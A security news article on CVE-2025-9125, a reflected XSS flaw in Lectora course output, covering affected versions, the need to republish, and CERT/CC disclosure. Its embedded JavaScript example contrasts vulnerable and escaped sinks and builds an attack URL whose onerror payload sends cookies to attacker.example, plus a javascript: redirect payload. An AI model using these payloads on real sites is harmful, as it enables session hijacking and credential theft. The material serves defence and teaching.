Categories: Cyber Security News

Lectora Desktop & Online Vulnerable to Reflected XSS via Crafted URL Parameters

A newly disclosed reflected cross-site scripting (XSS) flaw in ELB Learning's Lectora course authoring platform lets an attacker inject JavaScript into a published course through specially crafted URL parameters.

The vulnerability affects Lectora Desktop (Inspire and Publisher editions) versions 21.0 through 21.3 and Lectora Online versions 7.1.6 and earlier. Because the platform is used by government agencies and large enterprises, the flaw potentially exposes high-value users to session hijacking and redirection to attacker-controlled sites.

The CERT Coordination Center (CERT/CC) has issued Vulnerability Note VU#780141 to raise awareness and emphasize necessary remediation steps.

Vulnerability Details and Impact

Lectora, a widely adopted e-learning development tool, offers both desktop and cloud editions for creating interactive training courses.

CVE Identifier: CVE-2025-9125
Affected Products: Lectora Desktop 21.0–21.3; Lectora Online 7.1.6 and earlier
Vulnerability: Reflected XSS via crafted URL parameters. Injected JavaScript runs in the victim's browser and can display arbitrary content, hijack the session, or redirect the user to an attacker-controlled page.

When courses are published with Seamless Play Publish (SPP) enabled and Web Accessibility settings disabled, the published course output does not escape values taken from URL parameters, so an attacker can place JavaScript in a parameter and have the victim's browser execute it.

In practice, an attacker could lure a legitimate user into clicking a manipulated course URL, triggering client-side script execution.

That script could display arbitrary alerts, redirect the user to a malicious page, or read session cookies that are not marked HttpOnly, giving the attacker access to the learning platform or to other services that share the session.
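The pattern described above, as an added example that is not Lectora's player code: a URL parameter copied into the course page without escaping, beside the hardened form, for both an HTML sink and a navigation sink (the redirect case the advisory mentions). The parameter names "title" and "next", the markup, the course origin lms.example and the attacker host are assumptions; the advisory does not name the affected parameters.

```javascript
// Added example; not Lectora's code. Models the bug class in the advisory
// (URL parameter copied into a published course page unescaped) and the fix.
// Parameter names, markup and host names are assumptions.

// Parse window.location.search the way a player script would.
function parseQuery(search) {
  const params = {};
  const q = search.startsWith("?") ? search.slice(1) : search;
  for (const pair of q.split("&")) {
    if (!pair) continue;
    const i = pair.indexOf("=");
    const rawKey = i < 0 ? pair : pair.slice(0, i);
    const rawVal = i < 0 ? "" : pair.slice(i + 1);
    try {
      params[decodeURIComponent(rawKey)] = decodeURIComponent(rawVal.replace(/\+/g, " "));
    } catch {
      // Malformed percent-escape: drop the pair rather than throw.
    }
  }
  return params;
}

// VULNERABLE: the decoded value is concatenated into markup. Assigning this
// string to innerHTML (or passing it to document.write) runs the attacker's
// event handler in the victim's browser.
function renderTitleUnsafe(search) {
  const { title = "Untitled" } = parseQuery(search);
  return `<h1 class="course-title">${title}</h1>`;
}

// HARDENED: encode for the HTML text context before the value touches the DOM.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderTitleSafe(search) {
  const { title = "Untitled" } = parseQuery(search);
  return `<h1 class="course-title">${escapeHtml(title)}</h1>`;
}

// VULNERABLE: a "return to" parameter assigned straight to window.location.
// A javascript: URL executes script; an absolute URL sends the user off-site.
function redirectTargetUnsafe(search) {
  const { next = "index.html" } = parseQuery(search);
  return next;
}

// HARDENED: resolve against the course origin and accept only same-origin
// targets. javascript:, data: and foreign hosts all fall back to the default.
function redirectTargetSafe(search, origin) {
  const { next = "index.html" } = parseQuery(search);
  const base = new URL(origin);
  let url;
  try {
    url = new URL(next, base);
  } catch {
    return "index.html";
  }
  if (url.origin !== base.origin) return "index.html";
  return url.pathname + url.search + url.hash;
}

// Constructed attack URL of the kind a victim could be lured into clicking.
const ATTACK_SEARCH =
  "?title=" +
  encodeURIComponent('<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">');

console.log("unsafe title   :", renderTitleUnsafe(ATTACK_SEARCH));
console.log("safe title     :", renderTitleSafe(ATTACK_SEARCH));
console.log("unsafe redirect:", redirectTargetUnsafe("?next=javascript:alert(document.domain)"));
console.log("safe redirect  :", redirectTargetSafe("?next=javascript:alert(document.domain)", "https://lms.example"));
```

The fix is contextual output encoding at the sink, not input filtering: the same value must be escaped differently if it is placed in an attribute, a script block or a URL, and a redirect target needs an origin check rather than escaping. Note also that the fix lives in the player JavaScript that Lectora writes into the published output, which is why upgrading the authoring tool without republishing leaves the deployed courses unchanged.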

The underlying flaw was patched in Lectora Desktop version 21.4, released October 25, 2022, but the fix only reaches a course when it is republished with the patched tool, and the accompanying release notes did not explicitly say so.

As a result, courses published with 21.3 or earlier and never republished remain vulnerable despite the patch having been available since 2022.

Lectora Online users received the fix automatically on July 20, 2025, in version 7.1.7; unlike the Desktop release, the Online release notes clearly state that existing courses must be republished.

Mitigation and Remediation Steps

To fully remediate the XSS vulnerability, ELB Learning advises all Lectora Desktop customers to download version 21.4 or later from the ELB Learning portal and republish any courses created with earlier software versions.

Failure to republish leaves the vulnerable JavaScript in the course output already deployed on the web server or LMS; upgrading the authoring tool alone changes nothing there.

Lectora Online administrators should ensure that any content published before the July 20, 2025, automatic update is republished using the updated backend to incorporate the fix.

Course authors should also verify that Web Accessibility options are enabled when feasible, as disabling this setting contributes to the vulnerability conditions.

Where accessibility features conflict with course design requirements, authors must exercise caution and thoroughly test published content for script injection vectors.

Coordinated Disclosure and Acknowledgements

The CERT Coordination Center published VU#780141 on September 22, 2025, to amplify awareness given the platform’s use among sensitive organizations.

The vulnerability was responsibly reported by security researcher Mohammad Jassim and documented by Laurie Tyzenhaus of CERT/CC.

ELB Learning’s public statement acknowledges the limited scope of the issue and reinforces the requirement to republish courses after applying patches, emphasizing the company’s commitment to secure authoring workflows.

Organizations using Lectora are urged to treat this notice as high priority, complete the republishing process without delay, and audit existing course inventories for compliance.

Ensuring that all training materials incorporate the patched code will safeguard users against potential XSS-driven compromises and preserve the integrity of e-learning environments.
